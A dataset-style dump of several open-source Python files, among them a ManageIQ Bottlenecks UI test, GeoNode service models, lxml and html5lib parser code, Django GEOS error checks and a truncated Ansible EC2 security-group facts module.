repo_name
stringlengths 5
100
| path
stringlengths 4
375
| copies
stringclasses 991
values | size
stringlengths 4
7
| content
stringlengths 666
1M
| license
stringclasses 15
values |
---|---|---|---|---|---|
lkhomenk/integration_tests | cfme/tests/optimize/test_bottlenecks.py | 5 | 7933 | # -*- coding: utf-8 -*-
import fauxfactory
import pytest
from datetime import timedelta
from cfme.optimize.bottlenecks import Bottlenecks
from cfme.utils import conf
from cfme.utils.appliance.implementations.ui import navigate_to
from cfme.utils.blockers import BZ
from cfme.utils.timeutil import parsetime
from cfme.utils.ssh import SSHClient
pytestmark = pytest.mark.uncollectif(lambda appliance: appliance.is_pod)
@pytest.fixture(scope="module")
def temp_appliance_extended_db(temp_appliance_preconfig):
app = temp_appliance_preconfig
app.evmserverd.stop()
app.db.extend_partition()
app.start_evm_service()
return app
@pytest.fixture(scope="module")
def db_tbl(temp_appliance_extended_db):
app = temp_appliance_extended_db
return app.db.client['bottleneck_events']
@pytest.fixture(scope="module")
def db_events(temp_appliance_extended_db, db_tbl):
app = temp_appliance_extended_db
return app.db.client.session.query(db_tbl.timestamp,
db_tbl.resource_type, db_tbl.resource_name, db_tbl.event_type, db_tbl.severity, db_tbl.message)
@pytest.fixture(scope="module")
def db_restore(temp_appliance_extended_db):
app = temp_appliance_extended_db
app.evmserverd.stop()
app.db.drop()
db_storage_hostname = conf.cfme_data['bottlenecks']['hostname']
db_storage_ssh = SSHClient(hostname=db_storage_hostname, **conf.credentials['bottlenecks'])
with db_storage_ssh as ssh_client:
# Different files for different versions
ver = "_58" if temp_appliance_extended_db.version < '5.9' else "_59"
rand_filename = "/tmp/v2_key_{}".format(fauxfactory.gen_alphanumeric())
ssh_client.get_file("/home/backups/otsuman_db_bottlenecks/v2_key{}".format(ver),
rand_filename)
dump_filename = "/tmp/db_dump_{}".format(fauxfactory.gen_alphanumeric())
ssh_client.get_file("/home/backups/otsuman_db_bottlenecks/db.backup{}".format(ver),
dump_filename)
region_filename = "/tmp/REGION_{}".format(fauxfactory.gen_alphanumeric())
ssh_client.get_file("/home/backups/otsuman_db_bottlenecks/REGION{}".format(ver),
region_filename)
guid_filename = "/tmp/GUID_{}".format(fauxfactory.gen_alphanumeric())
ssh_client.get_file("/home/backups/otsuman_db_bottlenecks/GUID{}".format(ver),
guid_filename)
with app.ssh_client as ssh_client:
ssh_client.put_file(rand_filename, "/var/www/miq/vmdb/certs/v2_key")
ssh_client.put_file(dump_filename, "/tmp/evm_db.backup")
ssh_client.put_file(region_filename, "/var/www/miq/vmdb/REGION")
ssh_client.put_file(guid_filename, "/var/www/miq/vmdb/GUID")
app.db.restore()
app.start_evm_service()
app.wait_for_web_ui()
@pytest.mark.tier(2)
def test_bottlenecks_report_event_groups(temp_appliance_extended_db, db_restore, db_tbl, db_events):
""" Checks event_groups selectbox in report tab. It should filter events by type """
with temp_appliance_extended_db:
view = navigate_to(Bottlenecks, 'All')
# Enabling this option to show all possible values
view.report.show_host_events.fill(True)
view.report.event_groups.fill('Capacity')
rows = view.report.event_details.rows()
# Compare number of rows in bottleneck's table with number of rows in db
assert sum(1 for row in rows) == db_events.filter(db_tbl.event_type == 'DiskUsage').count()
view.report.event_groups.fill('Utilization')
rows = view.report.event_details.rows()
assert sum(1 for row in rows) == db_events.filter(db_tbl.event_type != 'DiskUsage').count()
@pytest.mark.tier(2)
def test_bottlenecks_report_show_host_events(temp_appliance_extended_db, db_restore, db_events):
""" Checks host_events checkbox in report tab. It should show or not host events """
with temp_appliance_extended_db:
view = navigate_to(Bottlenecks, 'All')
view.report.show_host_events.fill(False)
rows = view.report.event_details.rows(type='Host / Node')
# Checking that rows with value 'Host / Node' absent in table
assert not sum(1 for row in rows)
view.report.show_host_events.fill(True)
rows = view.report.event_details.rows()
# Compare number of rows in bottleneck's table with number of rows in db
assert sum(1 for row in rows) == db_events.count()
@pytest.mark.tier(2)
def test_bottlenecks_report_time_zone(temp_appliance_extended_db, db_restore, db_tbl, db_events):
""" Checks time zone selectbox in report tab. It should change time zone of events in table """
with temp_appliance_extended_db:
view = navigate_to(Bottlenecks, 'All')
row = view.report.event_details[0]
# Selecting row by uniq value
db_row = db_events.filter(db_tbl.message == row[5].text)
# Compare bottleneck's table timestamp with db
assert row[0].text == db_row[0][0].strftime(parsetime.american_with_utc_format)
# Changing time zone
view.report.time_zone.fill('(GMT-04:00) La Paz')
row = view.report.event_details[0]
assert row[0].text == (db_row[0][0] - timedelta(hours=4)).strftime("%m/%d/%y %H:%M:%S -04")
@pytest.mark.meta(blockers=[BZ(1507565, forced_streams=["5.8"])])
@pytest.mark.tier(2)
def test_bottlenecks_summary_event_groups(temp_appliance_extended_db, db_restore, db_tbl,
db_events):
""" Checks event_groups selectbox in summary tab. It should filter events by type """
with temp_appliance_extended_db:
view = navigate_to(Bottlenecks, 'All')
# Enabling this option to show all possible values
view.summary.show_host_events.fill(True)
view.summary.event_groups.fill('Capacity')
events = view.summary.chart.get_events()
# Compare number of events in chart with number of rows in db
assert len(events) == db_events.filter(db_tbl.event_type == 'DiskUsage').count()
view.summary.event_groups.fill('Utilization')
events = view.summary.chart.get_events()
assert len(events) == db_events.filter(db_tbl.event_type != 'DiskUsage').count()
@pytest.mark.tier(2)
def test_bottlenecks_summary_show_host_events(temp_appliance_extended_db, db_restore, db_events):
""" Checks host_events checkbox in summary tab. It should show or not host events """
with temp_appliance_extended_db:
view = navigate_to(Bottlenecks, 'All')
view.summary.show_host_events.fill(False)
# Checking that events with value 'Host / Node' absent in table
events = view.summary.chart.get_events()
assert not sum(1 for event in events if event.type == 'Host')
view.summary.show_host_events.fill(True)
events = view.summary.chart.get_events()
# Compare number of events in chart with number of rows in db
assert len(events) == db_events.count()
@pytest.mark.tier(2)
def test_bottlenecks_summary_time_zone(temp_appliance_extended_db, db_restore, db_tbl, db_events):
""" Checks time zone selectbox in summary tab. It should change time zone of events in chart """
with temp_appliance_extended_db:
view = navigate_to(Bottlenecks, 'All')
events = view.summary.chart.get_events()
# Selecting row by uniq value
db_row = db_events.filter(db_tbl.message == events[0].message)
# Compare event timestamp with db
assert events[0].time_stamp == db_row[0][0].strftime(parsetime.iso_with_utc_format)
# Changing time zone
view.summary.time_zone.fill('(GMT-04:00) La Paz')
events = view.summary.chart.get_events()
assert events[0].time_stamp == (db_row[0][0] - timedelta(hours=4)).strftime("%Y-%m-%d "
"%H:%M:%S -04")
| gpl-2.0 |
gdreich/geonode | geonode/services/models.py | 6 | 6197 | # -*- coding: utf-8 -*-
#########################################################################
#
# Copyright (C) 2016 OSGeo
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
#
#########################################################################
import logging
from django.conf import settings
from django.db import models
from geoserver.catalog import FailedRequestError, Catalog
from geonode.base.models import ResourceBase
from geonode.services.enumerations import SERVICE_TYPES, SERVICE_METHODS, GXP_PTYPES
from geonode.layers.models import Layer
from django.utils.translation import ugettext_lazy as _
from django.db.models import signals
from geonode.people.enumerations import ROLE_VALUES
from geonode.security.models import remove_object_permissions
STATUS_VALUES = [
'pending',
'failed',
'process'
]
logger = logging.getLogger("geonode.services")
"""
geonode.services
"""
class Service(ResourceBase):
"""
Service Class to represent remote Geo Web Services
"""
type = models.CharField(max_length=4, choices=SERVICE_TYPES)
method = models.CharField(max_length=1, choices=SERVICE_METHODS)
# with service, version and request etc stripped off
base_url = models.URLField(unique=True, db_index=True)
version = models.CharField(max_length=10, null=True, blank=True)
# Should force to slug?
name = models.CharField(max_length=255, unique=True, db_index=True)
description = models.CharField(max_length=255, null=True, blank=True)
online_resource = models.URLField(False, null=True, blank=True)
fees = models.CharField(max_length=1000, null=True, blank=True)
access_constraints = models.CharField(max_length=255, null=True, blank=True)
connection_params = models.TextField(null=True, blank=True)
username = models.CharField(max_length=50, null=True, blank=True)
password = models.CharField(max_length=50, null=True, blank=True)
api_key = models.CharField(max_length=255, null=True, blank=True)
workspace_ref = models.URLField(False, null=True, blank=True)
store_ref = models.URLField(null=True, blank=True)
resources_ref = models.URLField(null=True, blank=True)
profiles = models.ManyToManyField(
settings.AUTH_USER_MODEL, through='ServiceProfileRole')
created = models.DateTimeField(auto_now_add=True)
last_updated = models.DateTimeField(auto_now=True)
first_noanswer = models.DateTimeField(null=True, blank=True)
noanswer_retries = models.PositiveIntegerField(null=True, blank=True)
external_id = models.IntegerField(null=True, blank=True)
parent = models.ForeignKey(
'services.Service', null=True, blank=True, related_name='service_set')
# Supported Capabilities
def __unicode__(self):
return self.name
@property
def ptype(self):
# Return the gxp ptype that should be used to display layers
return GXP_PTYPES[self.type]
def get_absolute_url(self):
return '/services/%i' % self.id
class Meta(ResourceBase.Meta):
pass
class ServiceProfileRole(models.Model):
"""
ServiceProfileRole is an intermediate model to bind Profiles and Services and apply roles.
"""
profiles = models.ForeignKey(settings.AUTH_USER_MODEL)
service = models.ForeignKey(Service)
role = models.CharField(choices=ROLE_VALUES, max_length=255, help_text=_(
'function performed by the responsible party'))
class ServiceLayer(models.Model):
service = models.ForeignKey(Service)
layer = models.ForeignKey(Layer, null=True)
typename = models.CharField(_("Layer Name"), max_length=255)
title = models.CharField(_("Layer Title"), max_length=512)
description = models.TextField(_("Layer Description"), null=True)
styles = models.TextField(_("Layer Styles"), null=True)
class WebServiceHarvestLayersJob(models.Model):
service = models.OneToOneField(Service, blank=False, null=False)
status = models.CharField(choices=[(
x, x) for x in STATUS_VALUES], max_length=10, blank=False, null=False, default='pending')
class WebServiceRegistrationJob(models.Model):
base_url = models.URLField(unique=True)
type = models.CharField(max_length=4, choices=SERVICE_TYPES)
status = models.CharField(choices=[(
x, x) for x in STATUS_VALUES], max_length=10, blank=False, null=False, default='pending')
def post_save_service(instance, sender, created, **kwargs):
if created:
instance.set_default_permissions()
def pre_delete_service(instance, sender, **kwargs):
for layer in instance.layer_set.all():
layer.delete()
# if instance.method == 'H':
# gn = Layer.objects.gn_catalog
# gn.control_harvesting_task('stop', [instance.external_id])
# gn.control_harvesting_task('remove', [instance.external_id])
if instance.method == 'C':
try:
_user = settings.OGC_SERVER['default']['USER']
_password = settings.OGC_SERVER['default']['PASSWORD']
gs = Catalog(settings.OGC_SERVER['default']['LOCATION'] + "rest",
_user, _password)
cascade_store = gs.get_store(
instance.name, settings.CASCADE_WORKSPACE)
gs.delete(cascade_store, recurse=True)
except FailedRequestError:
logger.error(
"Could not delete cascading WMS Store for %s - maybe already gone" % instance.name)
remove_object_permissions(instance.get_self_resource())
signals.pre_delete.connect(pre_delete_service, sender=Service)
signals.post_save.connect(post_save_service, sender=Service)
| gpl-3.0 |
neumerance/cloudloon2 | .venv/lib/python2.7/site-packages/lxml/html/soupparser.py | 53 | 4360 | __doc__ = """External interface to the BeautifulSoup HTML parser.
"""
__all__ = ["fromstring", "parse", "convert_tree"]
from lxml import etree, html
from BeautifulSoup import \
BeautifulSoup, Tag, Comment, ProcessingInstruction, NavigableString
def fromstring(data, beautifulsoup=None, makeelement=None, **bsargs):
"""Parse a string of HTML data into an Element tree using the
BeautifulSoup parser.
Returns the root ``<html>`` Element of the tree.
You can pass a different BeautifulSoup parser through the
`beautifulsoup` keyword, and a diffent Element factory function
through the `makeelement` keyword. By default, the standard
``BeautifulSoup`` class and the default factory of `lxml.html` are
used.
"""
return _parse(data, beautifulsoup, makeelement, **bsargs)
def parse(file, beautifulsoup=None, makeelement=None, **bsargs):
"""Parse a file into an ElemenTree using the BeautifulSoup parser.
You can pass a different BeautifulSoup parser through the
`beautifulsoup` keyword, and a diffent Element factory function
through the `makeelement` keyword. By default, the standard
``BeautifulSoup`` class and the default factory of `lxml.html` are
used.
"""
if not hasattr(file, 'read'):
file = open(file)
root = _parse(file, beautifulsoup, makeelement, **bsargs)
return etree.ElementTree(root)
def convert_tree(beautiful_soup_tree, makeelement=None):
"""Convert a BeautifulSoup tree to a list of Element trees.
Returns a list instead of a single root Element to support
HTML-like soup with more than one root element.
You can pass a different Element factory through the `makeelement`
keyword.
"""
if makeelement is None:
makeelement = html.html_parser.makeelement
root = _convert_tree(beautiful_soup_tree, makeelement)
children = root.getchildren()
for child in children:
root.remove(child)
return children
# helpers
def _parse(source, beautifulsoup, makeelement, **bsargs):
if beautifulsoup is None:
beautifulsoup = BeautifulSoup
if makeelement is None:
makeelement = html.html_parser.makeelement
if 'convertEntities' not in bsargs:
bsargs['convertEntities'] = 'html'
tree = beautifulsoup(source, **bsargs)
root = _convert_tree(tree, makeelement)
# from ET: wrap the document in a html root element, if necessary
if len(root) == 1 and root[0].tag == "html":
return root[0]
root.tag = "html"
return root
def _convert_tree(beautiful_soup_tree, makeelement):
root = makeelement(beautiful_soup_tree.name,
attrib=dict(beautiful_soup_tree.attrs))
_convert_children(root, beautiful_soup_tree, makeelement)
return root
def _convert_children(parent, beautiful_soup_tree, makeelement):
SubElement = etree.SubElement
et_child = None
for child in beautiful_soup_tree:
if isinstance(child, Tag):
et_child = SubElement(parent, child.name, attrib=dict(
[(k, unescape(v)) for (k,v) in child.attrs]))
_convert_children(et_child, child, makeelement)
elif type(child) is NavigableString:
_append_text(parent, et_child, unescape(child))
else:
if isinstance(child, Comment):
parent.append(etree.Comment(child))
elif isinstance(child, ProcessingInstruction):
parent.append(etree.ProcessingInstruction(
*child.split(' ', 1)))
else: # CData
_append_text(parent, et_child, unescape(child))
def _append_text(parent, element, text):
if element is None:
parent.text = (parent.text or '') + text
else:
element.tail = (element.tail or '') + text
# copied from ET's ElementSoup
try:
from html.entities import name2codepoint # Python 3
except ImportError:
from htmlentitydefs import name2codepoint
import re
handle_entities = re.compile("&(\w+);").sub
def unescape(string):
if not string:
return ''
# work around oddities in BeautifulSoup's entity handling
def unescape_entity(m):
try:
return unichr(name2codepoint[m.group(1)])
except KeyError:
return m.group(0) # use as is
return handle_entities(unescape_entity, string)
| apache-2.0 |
MyAOSP/external_chromium_org | tools/json_schema_compiler/dart_generator_test.py | 25 | 2388 | #!/usr/bin/env python
# Copyright (c) 2012 The Chromium Authors. All rights reserved.
# Use of this source code is governed by a BSD-style license that can be
# found in the LICENSE file.
import os
import sys
import unittest
from compiler import GenerateSchema
# If --rebase is passed to this test, this is set to True, indicating the test
# output should be re-generated for each test (rather than running the tests
# themselves).
REBASE_MODE = False
# The directory containing the input and expected output files corresponding
# to each test name.
TESTS_DIR = 'dart_test'
class DartTest(unittest.TestCase):
def _RunTest(self, test_filename):
'''Given the name of a test, runs compiler.py on the file:
TESTS_DIR/test_filename.idl
and compares it to the output in the file:
TESTS_DIR/test_filename.dart
'''
file_rel = os.path.join(TESTS_DIR, test_filename)
output_dir = None
if REBASE_MODE:
output_dir = TESTS_DIR
output_code = GenerateSchema('dart', ['%s.idl' % file_rel], TESTS_DIR,
output_dir, None, None)
if not REBASE_MODE:
with open('%s.dart' % file_rel) as f:
expected_output = f.read()
# Remove the first line of the output code (as it contains the filename).
# Also remove all blank lines, ignoring them from the comparison.
# Compare with lists instead of strings for clearer diffs (especially with
# whitespace) when a test fails.
self.assertEqual([l for l in expected_output.split('\n') if l],
[l for l in output_code.split('\n')[1:] if l])
def setUp(self):
# Increase the maximum diff amount to see the full diff on a failed test.
self.maxDiff = 2000
def testComments(self):
self._RunTest('comments')
def testDictionaries(self):
self._RunTest('dictionaries')
def testEmptyNamespace(self):
self._RunTest('empty_namespace')
def testEmptyType(self):
self._RunTest('empty_type')
def testEvents(self):
self._RunTest('events')
def testBasicFunction(self):
self._RunTest('functions')
def testOpratableType(self):
self._RunTest('operatable_type')
def testTags(self):
self._RunTest('tags')
if __name__ == '__main__':
if '--rebase' in sys.argv:
print "Running in rebase mode."
REBASE_MODE = True
sys.argv.remove('--rebase')
unittest.main()
| bsd-3-clause |
NL66278/odoo | addons/account_cancel/__openerp__.py | 52 | 1667 | # -*- coding: utf-8 -*-
##############################################################################
#
# OpenERP, Open Source Management Solution
# Copyright (C) 2004-2010 Tiny SPRL (<http://tiny.be>).
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU Affero General Public License as
# published by the Free Software Foundation, either version 3 of the
# License, or (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Affero General Public License for more details.
#
# You should have received a copy of the GNU Affero General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
#
##############################################################################
{
'name': 'Cancel Journal Entries',
'version': '1.1',
'author': 'OpenERP SA',
'category': 'Accounting & Finance',
'description': """
Allows canceling accounting entries.
====================================
This module adds 'Allow Canceling Entries' field on form view of account journal.
If set to true it allows user to cancel entries & invoices.
""",
'website': 'https://www.odoo.com/page/accounting',
'images': ['images/account_cancel.jpeg'],
'depends' : ['account'],
'data': ['account_cancel_view.xml' ],
'demo': [],
'installable': True,
'auto_install': False,
}
# vim:expandtab:smartindent:tabstop=4:softtabstop=4:shiftwidth=4:
| agpl-3.0 |
samthor/intellij-community | python/lib/Lib/site-packages/django/contrib/gis/geos/prototypes/errcheck.py | 623 | 3522 | """
Error checking functions for GEOS ctypes prototype functions.
"""
import os
from ctypes import c_void_p, string_at, CDLL
from django.contrib.gis.geos.error import GEOSException
from django.contrib.gis.geos.libgeos import GEOS_VERSION
from django.contrib.gis.geos.prototypes.threadsafe import GEOSFunc
# Getting the `free` routine used to free the memory allocated for
# string pointers returned by GEOS.
if GEOS_VERSION >= (3, 1, 1):
# In versions 3.1.1 and above, `GEOSFree` was added to the C API
# because `free` isn't always available on all platforms.
free = GEOSFunc('GEOSFree')
free.argtypes = [c_void_p]
free.restype = None
else:
# Getting the `free` routine from the C library of the platform.
if os.name == 'nt':
# On NT, use the MS C library.
libc = CDLL('msvcrt')
else:
# On POSIX platforms C library is obtained by passing None into `CDLL`.
libc = CDLL(None)
free = libc.free
### ctypes error checking routines ###
def last_arg_byref(args):
"Returns the last C argument's value by reference."
return args[-1]._obj.value
def check_dbl(result, func, cargs):
"Checks the status code and returns the double value passed in by reference."
# Checking the status code
if result != 1: return None
# Double passed in by reference, return its value.
return last_arg_byref(cargs)
def check_geom(result, func, cargs):
"Error checking on routines that return Geometries."
if not result:
raise GEOSException('Error encountered checking Geometry returned from GEOS C function "%s".' % func.__name__)
return result
def check_minus_one(result, func, cargs):
"Error checking on routines that should not return -1."
if result == -1:
raise GEOSException('Error encountered in GEOS C function "%s".' % func.__name__)
else:
return result
def check_predicate(result, func, cargs):
"Error checking for unary/binary predicate functions."
val = ord(result) # getting the ordinal from the character
if val == 1: return True
elif val == 0: return False
else:
raise GEOSException('Error encountered on GEOS C predicate function "%s".' % func.__name__)
def check_sized_string(result, func, cargs):
"""
Error checking for routines that return explicitly sized strings.
This frees the memory allocated by GEOS at the result pointer.
"""
if not result:
raise GEOSException('Invalid string pointer returned by GEOS C function "%s"' % func.__name__)
# A c_size_t object is passed in by reference for the second
# argument on these routines, and its needed to determine the
# correct size.
s = string_at(result, last_arg_byref(cargs))
# Freeing the memory allocated within GEOS
free(result)
return s
def check_string(result, func, cargs):
"""
Error checking for routines that return strings.
This frees the memory allocated by GEOS at the result pointer.
"""
if not result: raise GEOSException('Error encountered checking string return value in GEOS C function "%s".' % func.__name__)
# Getting the string value at the pointer address.
s = string_at(result)
# Freeing the memory allocated within GEOS
free(result)
return s
def check_zero(result, func, cargs):
"Error checking on routines that should not return 0."
if result == 0:
raise GEOSException('Error encountered in GEOS C function "%s".' % func.__name__)
else:
return result
| apache-2.0 |
sunlianqiang/kbengine | kbe/res/scripts/common/Lib/site-packages/pip/_vendor/html5lib/treebuilders/etree.py | 915 | 12621 | from __future__ import absolute_import, division, unicode_literals
from pip._vendor.six import text_type
import re
from . import _base
from .. import ihatexml
from .. import constants
from ..constants import namespaces
from ..utils import moduleFactoryFactory
tag_regexp = re.compile("{([^}]*)}(.*)")
def getETreeBuilder(ElementTreeImplementation, fullTree=False):
ElementTree = ElementTreeImplementation
ElementTreeCommentType = ElementTree.Comment("asd").tag
class Element(_base.Node):
def __init__(self, name, namespace=None):
self._name = name
self._namespace = namespace
self._element = ElementTree.Element(self._getETreeTag(name,
namespace))
if namespace is None:
self.nameTuple = namespaces["html"], self._name
else:
self.nameTuple = self._namespace, self._name
self.parent = None
self._childNodes = []
self._flags = []
def _getETreeTag(self, name, namespace):
if namespace is None:
etree_tag = name
else:
etree_tag = "{%s}%s" % (namespace, name)
return etree_tag
def _setName(self, name):
self._name = name
self._element.tag = self._getETreeTag(self._name, self._namespace)
def _getName(self):
return self._name
name = property(_getName, _setName)
def _setNamespace(self, namespace):
self._namespace = namespace
self._element.tag = self._getETreeTag(self._name, self._namespace)
def _getNamespace(self):
return self._namespace
namespace = property(_getNamespace, _setNamespace)
def _getAttributes(self):
return self._element.attrib
def _setAttributes(self, attributes):
# Delete existing attributes first
# XXX - there may be a better way to do this...
for key in list(self._element.attrib.keys()):
del self._element.attrib[key]
for key, value in attributes.items():
if isinstance(key, tuple):
name = "{%s}%s" % (key[2], key[1])
else:
name = key
self._element.set(name, value)
attributes = property(_getAttributes, _setAttributes)
def _getChildNodes(self):
return self._childNodes
def _setChildNodes(self, value):
del self._element[:]
self._childNodes = []
for element in value:
self.insertChild(element)
childNodes = property(_getChildNodes, _setChildNodes)
def hasContent(self):
"""Return true if the node has children or text"""
return bool(self._element.text or len(self._element))
def appendChild(self, node):
self._childNodes.append(node)
self._element.append(node._element)
node.parent = self
def insertBefore(self, node, refNode):
index = list(self._element).index(refNode._element)
self._element.insert(index, node._element)
node.parent = self
def removeChild(self, node):
self._element.remove(node._element)
node.parent = None
def insertText(self, data, insertBefore=None):
if not(len(self._element)):
if not self._element.text:
self._element.text = ""
self._element.text += data
elif insertBefore is None:
# Insert the text as the tail of the last child element
if not self._element[-1].tail:
self._element[-1].tail = ""
self._element[-1].tail += data
else:
# Insert the text before the specified node
children = list(self._element)
index = children.index(insertBefore._element)
if index > 0:
if not self._element[index - 1].tail:
self._element[index - 1].tail = ""
self._element[index - 1].tail += data
else:
if not self._element.text:
self._element.text = ""
self._element.text += data
def cloneNode(self):
element = type(self)(self.name, self.namespace)
for name, value in self.attributes.items():
element.attributes[name] = value
return element
def reparentChildren(self, newParent):
if newParent.childNodes:
newParent.childNodes[-1]._element.tail += self._element.text
else:
if not newParent._element.text:
newParent._element.text = ""
if self._element.text is not None:
newParent._element.text += self._element.text
self._element.text = ""
_base.Node.reparentChildren(self, newParent)
class Comment(Element):
def __init__(self, data):
# Use the superclass constructor to set all properties on the
# wrapper element
self._element = ElementTree.Comment(data)
self.parent = None
self._childNodes = []
self._flags = []
def _getData(self):
return self._element.text
def _setData(self, value):
self._element.text = value
data = property(_getData, _setData)
class DocumentType(Element):
def __init__(self, name, publicId, systemId):
Element.__init__(self, "<!DOCTYPE>")
self._element.text = name
self.publicId = publicId
self.systemId = systemId
def _getPublicId(self):
return self._element.get("publicId", "")
def _setPublicId(self, value):
if value is not None:
self._element.set("publicId", value)
publicId = property(_getPublicId, _setPublicId)
def _getSystemId(self):
return self._element.get("systemId", "")
def _setSystemId(self, value):
if value is not None:
self._element.set("systemId", value)
systemId = property(_getSystemId, _setSystemId)
class Document(Element):
def __init__(self):
Element.__init__(self, "DOCUMENT_ROOT")
class DocumentFragment(Element):
def __init__(self):
Element.__init__(self, "DOCUMENT_FRAGMENT")
def testSerializer(element):
rv = []
def serializeElement(element, indent=0):
if not(hasattr(element, "tag")):
element = element.getroot()
if element.tag == "<!DOCTYPE>":
if element.get("publicId") or element.get("systemId"):
publicId = element.get("publicId") or ""
systemId = element.get("systemId") or ""
rv.append("""<!DOCTYPE %s "%s" "%s">""" %
(element.text, publicId, systemId))
else:
rv.append("<!DOCTYPE %s>" % (element.text,))
elif element.tag == "DOCUMENT_ROOT":
rv.append("#document")
if element.text is not None:
rv.append("|%s\"%s\"" % (' ' * (indent + 2), element.text))
if element.tail is not None:
raise TypeError("Document node cannot have tail")
if hasattr(element, "attrib") and len(element.attrib):
raise TypeError("Document node cannot have attributes")
elif element.tag == ElementTreeCommentType:
rv.append("|%s<!-- %s -->" % (' ' * indent, element.text))
else:
assert isinstance(element.tag, text_type), \
"Expected unicode, got %s, %s" % (type(element.tag), element.tag)
nsmatch = tag_regexp.match(element.tag)
if nsmatch is None:
name = element.tag
else:
ns, name = nsmatch.groups()
prefix = constants.prefixes[ns]
name = "%s %s" % (prefix, name)
rv.append("|%s<%s>" % (' ' * indent, name))
if hasattr(element, "attrib"):
attributes = []
for name, value in element.attrib.items():
nsmatch = tag_regexp.match(name)
if nsmatch is not None:
ns, name = nsmatch.groups()
prefix = constants.prefixes[ns]
attr_string = "%s %s" % (prefix, name)
else:
attr_string = name
attributes.append((attr_string, value))
for name, value in sorted(attributes):
rv.append('|%s%s="%s"' % (' ' * (indent + 2), name, value))
if element.text:
rv.append("|%s\"%s\"" % (' ' * (indent + 2), element.text))
indent += 2
for child in element:
serializeElement(child, indent)
if element.tail:
rv.append("|%s\"%s\"" % (' ' * (indent - 2), element.tail))
serializeElement(element, 0)
return "\n".join(rv)
def tostring(element):
"""Serialize an element and its child nodes to a string"""
rv = []
filter = ihatexml.InfosetFilter()
def serializeElement(element):
if isinstance(element, ElementTree.ElementTree):
element = element.getroot()
if element.tag == "<!DOCTYPE>":
if element.get("publicId") or element.get("systemId"):
publicId = element.get("publicId") or ""
systemId = element.get("systemId") or ""
rv.append("""<!DOCTYPE %s PUBLIC "%s" "%s">""" %
(element.text, publicId, systemId))
else:
rv.append("<!DOCTYPE %s>" % (element.text,))
elif element.tag == "DOCUMENT_ROOT":
if element.text is not None:
rv.append(element.text)
if element.tail is not None:
raise TypeError("Document node cannot have tail")
if hasattr(element, "attrib") and len(element.attrib):
raise TypeError("Document node cannot have attributes")
for child in element:
serializeElement(child)
elif element.tag == ElementTreeCommentType:
rv.append("<!--%s-->" % (element.text,))
else:
# This is assumed to be an ordinary element
if not element.attrib:
rv.append("<%s>" % (filter.fromXmlName(element.tag),))
else:
attr = " ".join(["%s=\"%s\"" % (
filter.fromXmlName(name), value)
for name, value in element.attrib.items()])
rv.append("<%s %s>" % (element.tag, attr))
if element.text:
rv.append(element.text)
for child in element:
serializeElement(child)
rv.append("</%s>" % (element.tag,))
if element.tail:
rv.append(element.tail)
serializeElement(element)
return "".join(rv)
class TreeBuilder(_base.TreeBuilder):
documentClass = Document
doctypeClass = DocumentType
elementClass = Element
commentClass = Comment
fragmentClass = DocumentFragment
implementation = ElementTreeImplementation
def testSerializer(self, element):
return testSerializer(element)
def getDocument(self):
if fullTree:
return self.document._element
else:
if self.defaultNamespace is not None:
return self.document._element.find(
"{%s}html" % self.defaultNamespace)
else:
return self.document._element.find("html")
def getFragment(self):
return _base.TreeBuilder.getFragment(self)._element
return locals()
getETreeModule = moduleFactoryFactory(getETreeBuilder)
| lgpl-3.0 |
dimid/ansible-modules-extras | cloud/amazon/ec2_group_facts.py | 12 | 5047 | #!/usr/bin/python
# This file is part of Ansible
#
# Ansible is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# Ansible is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with Ansible. If not, see <http://www.gnu.org/licenses/>.
DOCUMENTATION = '''
---
module: ec2_group_facts
short_description: Gather facts about ec2 security groups in AWS.
description:
- Gather facts about ec2 security groups in AWS.
version_added: "2.3"
author: "Henrique Rodrigues (github.com/Sodki)"
options:
filters:
description:
- A dict of filters to apply. Each dict item consists of a filter key and a filter value. See \
U(https://docs.aws.amazon.com/AWSEC2/latest/APIReference/API_DescribeSecurityGroups.html) for \
possible filters. Filter names and values are case sensitive. You can also use underscores (_) \
instead of dashes (-) in the filter keys, which will take precedence in case of conflict.
required: false
default: {}
notes:
- By default, the module will return all security groups. To limit results use the appropriate filters.
extends_documentation_fragment:
- aws
- ec2
'''
EXAMPLES = '''
# Note: These examples do not set authentication details, see the AWS Guide for details.
# Gather facts about all security groups
- ec2_group_facts:
# Gather facts about all security groups in a specific VPC
- ec2_group_facts:
filters:
vpc-id: vpc-12345678
# Gather facts about all security groups in a specific VPC
- ec2_group_facts:
filters:
vpc-id: vpc-12345678
# Gather facts about a security group
- ec2_group_facts:
filters:
group-name: example-1
# Gather facts about a security group by id
- ec2_group_facts:
filters:
group-id: sg-12345678
# Gather facts about a security group with multiple filters, also mixing the use of underscores as filter keys
- ec2_group_facts:
filters:
group_id: sg-12345678
vpc-id: vpc-12345678
# Gather facts about various security groups
- ec2_group_facts:
filters:
group-name:
- example-1
- example-2
- example-3
# Gather facts about any security group with a tag key Name and value Example. The quotes around 'tag:name' are important because of the colon in the value
- ec2_group_facts:
filters:
"tag:Name": Example
'''
RETURN = '''
security_groups:
description: Security groups that match the provided filters. Each element consists of a dict with all the information related to that security group.
type: list
sample:
'''
try:
import boto3
from botocore.exceptions import ClientError
HAS_BOTO3 = True
except ImportError:
HAS_BOTO3 = Falsentry
import traceback
def main():
argument_spec = ec2_argument_spec()
argument_spec.update(
dict(
filters=dict(default={}, type='dict')
)
)
module = AnsibleModule(argument_spec=argument_spec)
if not HAS_BOTO3:
module.fail_json(msg='boto3 required for this module')
